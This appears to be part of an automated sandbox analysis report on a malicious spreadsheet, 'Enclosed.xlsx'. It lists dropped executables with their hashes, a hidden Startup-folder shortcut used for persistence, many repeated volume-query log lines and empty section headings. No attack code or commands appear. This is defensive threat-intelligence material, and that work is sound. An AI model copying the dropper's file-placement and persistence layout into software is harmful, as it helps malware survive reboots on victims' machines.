C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat	data	7E8F4A764B981D5B82D1CC49D341E9C6	D9F0685A028FB219E1A6286AEFB7D6FCFC778B85	0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide	D7B7957225A72E5785C16723D3DEBDB5	5ABC0ED3081D57EC645BF78A8194A919420E036C	67403FD711E36C1249752358C2C485BCDE940CDD08ACB1E0569904076A1C7603
C:\Users\user\Desktop\~$Enclosed.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4C658DB84A58CE7EC0C2F2EB9F14C97C	CE119BDEE8F67E1AEF1E45DA57C0BF2E858D3826	3BEE3F04F56446103684FC76026CFAA5AB39CF206489B2E7C9142EAD5A68C738

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Queries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Queries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Queries volume information: C:\Users\user\AppData\Local\sys4h57g\sys30.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sys30s.exe VolumeInformation

Windows Analysis Report Enclosed.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs